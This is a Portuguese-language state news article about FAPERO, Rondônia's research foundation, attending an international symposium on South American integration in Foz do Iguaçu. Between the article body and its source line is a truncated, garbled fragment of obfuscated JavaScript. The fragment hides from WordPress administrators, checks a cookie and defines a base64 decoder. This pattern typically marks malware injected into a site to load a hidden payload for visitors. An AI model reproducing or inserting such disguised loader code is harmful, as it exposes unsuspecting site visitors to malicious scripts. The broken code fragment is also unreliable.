Compartilhar

O Governo de Rondônia, por meio da FAPERO, participa do II Simpósio Internacional sobre Rotas de Integração Sul-Americana

Publicado em: 24/10/2025 17:40

O Governo de Rondônia, por meio da Fundação de Amparo ao Desenvolvimento das Ações Científicas e Tecnológicas e à Pesquisa (FAPERO), participa do II Simpósio Internacional sobre Rotas de Integração Sul-Americana, a convite da Universidade Federal da Integração Latino-Americana (Unila) e da Fundação Araucária.

O objetivo do simpósio é fortalecer a formação e a pesquisa em projetos que desenvolvam os potenciais de integração e crescimento econômico da região, abrangendo Rondônia, Acre, Peru e Bolívia. A estratégia é buscar investimentos federais na próxima Lei Orçamentária Anual (LOA) e nos futuros Planos Plurianuais (PPAs), consolidando uma rede de cooperação entre os estados e países participantes.

A integração social, econômica e ambiental é um dos eixos centrais do encontro, que busca promover o desenvolvimento regional a partir da ciência e da inovação.

Entre os dias 8 e 10 de outubro, o evento é sediado em Foz do Iguaçu, no Campus Integração da Universidade Federal da Integração Latino-Americana (Unila). O simpósio é organizado pela Unila, em parceria com a Agência Brasileira de Desenvolvimento Industrial (ABDI), Associação Brasileira de Relações Internacionais (ABRI), Fundação Araucária, Napi Trinacional e Red de Expertos en Paradiplomacia e Internacionalización Territorial.

Durante o evento, o presidente da FAPERO, Paulo Renato Haddad, esteve com o presidente da Fundação Araucária e com o embaixador Sérgio Eduardo Moreira Lima, discutindo ações conjuntas voltadas ao fortalecimento da pesquisa científica e tecnológica na região Norte.

O presidente também esteve com a professora Patrícia Miranda, da Assessoria de Relações Internacionais da Universidade Federal de Rondônia (UNIR), e com o diretor científico da FAPERR, dialogando sobre estratégias para integração de redes de pesquisa, inovação e cooperação entre universidades e fundações de amparo à pesquisa na América do Sul.

A participação da FAPERO no evento reforça o compromisso do Governo de Rondônia com o fortalecimento da ciência, tecnologia e inovação, ampliando as oportunidades de desenvolvimento regional e integração internacional.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i4);o2=((h2&15)2);o3=((h3&3)

Fonte: Agência de Notícias do Estado de RO

Faça um comentário